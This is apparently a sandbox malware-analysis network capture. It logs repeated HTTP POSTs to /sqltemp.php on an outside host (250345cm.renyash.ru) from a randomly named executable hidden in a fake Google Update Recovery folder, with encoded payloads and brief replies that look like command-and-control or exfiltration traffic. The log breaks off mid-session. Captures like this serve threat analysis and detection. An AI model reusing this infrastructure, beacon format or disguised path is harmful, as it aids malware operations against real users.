                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2628&min_rtt=1994&rtt_var=2016&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=206594&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  83192.168.2.662719104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:14.614149094 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:14.982657909 CET1124OUTData Raw: 53 50 5f 5c 51 5d 54 53 58 56 52 59 56 51 59 55 5b 5d 54 5c 55 5e 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_\Q]TSXVRYVQYU[]T\U^PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3/#?Y3;-T#-Z**;W)-<7\+(*&<7V.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:15.067742109 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:15.335500956 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2vdJ1CpB%2BvWyDNxnn83m84GBuxEmIdLVPiQ23jqSqCUmbVThQUMHMojqF%2Bv%2B7q9fRepkN2J8vT8n0tK4xq826fUwR4LmT%2Fv41DQSBIz05nhWsH30c8FREZQFbtTpXhmMu2o6OCx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3651ee874c346-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2838&min_rtt=1758&rtt_var=2820&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=140344&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  84192.168.2.662720104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:15.455957890 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:15.813499928 CET1124OUTData Raw: 53 54 5f 51 54 5d 51 55 58 56 52 59 56 51 59 53 5b 5b 54 5a 55 59 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_QT]QUXVRYVQYS[[TZUYPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0Y"?0.7C;*=4;+);T*<[!2#<&?#,*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:15.897746086 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:16.402477026 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SH39TjxRcCEXcqoejwE8W5hNigrKlJFM7yg2eVgLYKdGrAJVG2Bs1PfO6SCp4pvDOx5ApSpg%2FafP%2Bq8TdzfKIoC3oh6x8w3NPoDTW4%2B0dtQlo0s2zzncaPIwZE%2FyOuffO0ZTTptc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3652419bd8c84-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2917&min_rtt=2020&rtt_var=2552&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=158695&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  85192.168.2.662721104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:16.534173965 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:16.891745090 CET1124OUTData Raw: 53 57 5f 54 54 51 54 5c 58 56 52 59 56 5a 59 52 5b 53 54 5d 55 5c 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_TTQT\XVRYVZYR[ST]U\P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._&?)7-Y0-;E/*%7><_<'U>,#T <$/ -&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:16.987915039 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:17.252648115 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9SDhbThToMXEL5z59u%2F0r5zpYNS2eT9zSN38B%2B%2BqUpS7T47dsup%2Fz5bm5Is5CtoB9YqW%2BqlZUt5wrc%2BTGV5H0KqLILqwwvH%2F84Q3qUFyuWcFPj9N8xE0GZrmFlZtEwqnsGGAKIcB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3652aee3e0f9d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4565&min_rtt=1587&rtt_var=6551&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57455&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  86192.168.2.662722104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:17.397945881 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1112
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:17.751094103 CET1112OUTData Raw: 53 57 5f 55 51 58 54 52 58 56 52 59 56 59 59 57 5b 52 54 5a 55 55 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_UQXTRXVRYVYYW[RTZUUPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.&?*#?0..9%#.8**;*4!3+:$,7V.*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:17.841615915 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:18.102741003 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rReysgt93NmtoRsSAWbHNGh2ixPcv1aBsFTyZeqVLpKc200%2FjrhChz7FO60fS%2Bn8zaRfqbCr%2F1dluA3QbrYkwG7TOZQo9mO2RkvGAcU%2Fc4knUEm23wzzyJEZTbR7QrgC7l3trcRN"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365303c0142ca-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1737&rtt_var=971&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1414&delivery_rate=484084&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  87192.168.2.662725104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:18.238538980 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:18.594813108 CET1124OUTData Raw: 56 52 5f 5c 54 5f 51 50 58 56 52 59 56 5c 59 52 5b 5c 54 5b 55 59 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_\T_QPXVRYV\YR[\T[UYP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&/! <=3>?C;"7=?('*X+#!#(!D$,'R:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:18.682545900 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:18.939131975 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etnXuYMHruqh54neYJEC3kfAbBkPDRugNE%2BMfiP5RpKumMX79Wzz97WTZTNtpjLBw4nFsKmSxumlKs9cu4kiJYrqbWkO2qil6Nnjb6Sdu41VEOpP0W%2BaPnXb1j2KJG1PfBPKpPsQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365357ed67ca5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2548&min_rtt=2035&rtt_var=1790&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=237630&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  88192.168.2.662726104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:19.072904110 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  89192.168.2.662727104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:19.352675915 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:19.704116106 CET1964OUTData Raw: 56 53 5a 50 51 5c 54 51 58 56 52 59 56 51 59 57 5b 5e 54 59 55 59 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VSZPQ\TQXVRYVQYW[^TYUYP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y3/6 <1Y30;* =+)()X74"[<"28.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:19.808497906 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:20.072254896 CET961INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVbnqMt2V67pPPGcSS1lETgn%2FUXsc7UfTKVK5uoCP934%2B%2FKBSd716H87a1mLQyfA74YTMagsyaz%2B%2FrY3RrHQpea%2BieNiNqmMCDGwNLO0BEhfgeOXALJP7IcQWuuLLMOhQwJ9ti1%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3653c8cd95e5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3984&min_rtt=2137&rtt_var=4496&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=86298&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 3e 04 3e 1d 31 22 27 05 2b 2d 28 0b 26 3d 2e 11 2b 3b 2e 17 27 3e 3c 03 2a 07 02 02 21 3f 29 13 26 2b 24 5f 34 3d 05 11 30 24 2b 59 05 1c 20 08 36 2c 2b 02 3e 3d 33 59 26 06 2d 5c 33 3e 38 16 3c 3b 28 1e 20 2b 24 07 33 04 3c 58 3e 14 20 56 24 2c 37 5f 2d 59 2d 57 33 2a 2c 54 00 11 26 13 25 31 15 07 22 27 2c 11 22 31 26 07 26 0a 0c 57 32 3c 09 52 21 29 22 5d 32 0b 27 59 35 0a 3e 1c 25 02 25 13 20 03 2f 50 3e 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q>>1"'+-(&=.+;.'><*!?)&+$_4=0$+Y 6,+>=3Y&-\3>8<;( +$3<X> V$,7_-Y-W3*,T&%1"',"1&&W2<R!)"]2'Y5>%% /P>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  90192.168.2.662728104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:19.479906082 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:19.829138994 CET1120OUTData Raw: 53 50 5f 5d 54 5f 51 57 58 56 52 59 56 59 59 54 5b 5e 54 5a 55 5c 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_]T_QWXVRYVYYT[^TZU\P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-09#?:$=+@,*&#-0_?7S*-$#7X?%B% -&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:19.922841072 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:20.176903963 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NnYmznSFIClix7rtjJ%2B664S9r%2BKmKOX%2Fv2NstQOJTXUym4o%2BPFZkXrN8b6Lhpd%2Bq51Wn5BAX58IDxXay8dh%2B5eS2dEWbNobcD4i%2Bty9JjbeAc163QY8dqSH2insHYDHf5Aig9VEZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3653d3e7a17ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4547&min_rtt=1471&rtt_var=6705&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1422&delivery_rate=55973&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:20.263592958 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  91192.168.2.662729104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:20.394752026 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:20.751038074 CET1124OUTData Raw: 56 52 5f 56 51 58 51 55 58 56 52 59 56 5e 59 50 5b 5d 54 5c 55 5b 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_VQXQUXVRYV^YP[]T\U[PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X&<5Y#<2'-7D;)!W7<+9T>4 (&&/,::&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:20.864494085 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:21.036792040 CET798INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FmUGdVqESMjigHujvWBqvxioynn8DLgsd4sug2x1zQcKqSiF9Yak575ngbNRONumsvFS4lc7Xo4y51Ooa4rKzjW1b1ykmwCtPCotPZFcXL0hcKTKElKXRKYNWHQ2BQJUjRLcY5mQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365431fabc3f5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1490&rtt_var=6155&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=61149&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  92192.168.2.662731104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:21.169689894 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:21.516659975 CET1124OUTData Raw: 56 54 5f 50 54 5b 51 51 58 56 52 59 56 5b 59 57 5b 5b 54 58 55 59 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
